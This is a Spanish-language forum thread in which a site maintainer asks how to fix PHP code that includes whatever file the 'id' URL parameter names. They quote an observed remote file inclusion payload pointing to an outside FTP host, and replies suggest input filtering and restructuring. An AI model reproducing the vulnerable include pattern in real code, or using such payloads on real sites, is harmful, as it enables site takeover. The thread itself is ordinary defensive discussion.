Filtrar codigo PHP para mayor seguridad, o sustuir po un metodo similar

loncho_rojas · #1 (**permalink**) 15/09/2010, 15:05

Hola.. como estan, me han pasado una pagina Web para mantenerla, pero en estas lineas de script me han detectado una inyeccion de codigo:

Código PHP:

Ver original<?php
 
    if(!isset($_GET['id']))
    { 
    include("inicio.php"); 
    } else {
    if(file_exists($_GET['id'].".php"))
    {
        include($_GET['id'].".php");
    } else {
        include("error.php");
    }
    }
    
 
?>

esto actua como un Frame que llama a otras paginas, y si no existe, tira la pagina de error

Como podría actualizar este código? o como podria generar un filtro para que no me inyecten un código..

(lo que me estan inyectando es esto: favor no abrirlo, no es un virus, solo como ejemplo)

index.php? id=ftp:// lucronarede. t5.com. br:864798@
lucronarede.t5.com. br/g.txt?

Lo separo todo para que no lo tome como LINK... quiero evitar que sigan entrando desde aqui.. necesito un cable por favor..

Gracias

Hidek1 · #2 (**permalink**) 15/09/2010, 15:12

es pesima idea dejar que las personas tengan acceso directo a un include..
si no sabes los nombres de los botones.. (link dinamicos) podrias usar mod rewrite para controlar eso
o alguna regex que solo te permita letras dentro de ?id=
saludos!

silvanha · #3 (**permalink**) 15/09/2010, 18:38

eso significa que de acuerdo al id, tienes tantos archivos como id's

1.php, 2.php, 3.php..

otra opción además de lo que te comento Hidek, es crear un solo archivo, me imagino que esos archivos tienen algo en común, no olvides, el dinamismo que te ofrecen las páginas PHP.. y luego llamar solo a el.. digo no tiene mucho sentido lo que estas haciendo :P

saluditos ^^